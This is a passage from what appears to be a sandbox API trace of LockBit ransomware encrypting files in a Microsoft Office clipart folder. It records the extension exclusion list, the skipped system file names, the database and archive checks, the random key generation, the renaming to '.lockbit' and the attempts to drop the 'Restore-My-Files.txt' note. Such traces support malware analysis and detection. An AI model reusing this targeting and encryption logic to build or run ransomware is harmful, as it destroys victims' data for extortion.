Office\\CLIPART\\PUB60COR\\") returned="" [0117.840] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned=".WMF" [0117.840] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.840] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.842] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.842] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.lockbit") returned 72 [0117.842] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.855] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.855] malloc (_Size=0x40068) returned 0x1ff1e60 [0117.855] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5798) returned 1 [0117.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0117.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0117.856] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.859] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.859] malloc (_Size=0xa6) returned 0x77d7a8 [0117.859] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.860] free (_Block=0x77d7a8) [0117.860] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.860] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.860] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.860] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c49d600, ftCreationTime.dwHighDateTime=0x1bd4b33, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c49d600, ftLastWriteTime.dwHighDateTime=0x1bd4b33, nFileSizeHigh=0x0, nFileSizeLow=0xe86, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00546_.WMF", cAlternateFileName="")) returned 1 [0117.860] lstrcmpiW (lpString1=".", lpString2="HH00546_.WMF") returned -1 [0117.860] lstrcmpiW (lpString1="..", lpString2="HH00546_.WMF") returned -1 [0117.860] PathFindExtensionW (pszPath="HH00546_.WMF") returned=".WMF" [0117.860] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.860] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.861] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.861] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.862] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00546_.WMF") returned 1 [0117.862] lstrcmpiW (lpString1="ntldr", lpString2="HH00546_.WMF") returned 1 [0117.862] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00546_.WMF") returned 1 [0117.862] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00546_.WMF") returned -1 [0117.862] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00546_.WMF") returned -1 [0117.862] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00546_.WMF") returned 1 [0117.862] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00546_.WMF") returned 1 [0117.862] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.862] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned=".WMF" [0117.863] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.863] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.863] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.864] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.864] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.864] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.864] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.864] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.864] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.864] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.lockbit") returned 72 [0117.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0117.865] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.865] malloc (_Size=0x40068) returned 0x3d70450 [0117.865] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3718) returned 1 [0117.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.867] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.871] malloc (_Size=0xa6) returned 0x77d7a8 [0117.871] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.872] free (_Block=0x77d7a8) [0117.872] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.872] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.872] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.872] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e63d00, ftCreationTime.dwHighDateTime=0x1bd4b2a, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x48e63d00, ftLastWriteTime.dwHighDateTime=0x1bd4b2a, nFileSizeHigh=0x0, nFileSizeLow=0x5bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00601_.WMF", cAlternateFileName="")) returned 1 [0117.872] lstrcmpiW (lpString1=".", lpString2="HH00601_.WMF") returned -1 [0117.872] lstrcmpiW (lpString1="..", lpString2="HH00601_.WMF") returned -1 [0117.872] PathFindExtensionW (pszPath="HH00601_.WMF") returned=".WMF" [0117.873] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.873] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.874] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.874] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00601_.WMF") returned 1 [0117.875] lstrcmpiW (lpString1="ntldr", lpString2="HH00601_.WMF") returned 1 [0117.875] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00601_.WMF") returned 1 [0117.875] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00601_.WMF") returned -1 [0117.875] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00601_.WMF") returned -1 [0117.875] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00601_.WMF") returned 1 [0117.875] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00601_.WMF") returned 1 [0117.875] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.875] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned=".WMF" [0117.875] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.875] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.875] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.876] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.877] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.877] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.877] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.lockbit") returned 72 [0117.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0117.878] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.878] malloc (_Size=0x40068) returned 0x3e70008 [0117.878] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1468) returned 1 [0117.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0117.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0117.879] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0117.884] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.884] malloc (_Size=0xa6) returned 0x77d7a8 [0117.884] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.885] free (_Block=0x77d7a8) [0117.885] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.885] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.885] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb62b00, ftCreationTime.dwHighDateTime=0x1bd4b47, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5eb62b00, ftLastWriteTime.dwHighDateTime=0x1bd4b47, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00602_.WMF", cAlternateFileName="")) returned 1 [0117.885] lstrcmpiW (lpString1=".", lpString2="HH00602_.WMF") returned -1 [0117.886] lstrcmpiW (lpString1="..", lpString2="HH00602_.WMF") returned -1 [0117.886] PathFindExtensionW (pszPath="HH00602_.WMF") returned=".WMF" [0117.886] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.886] 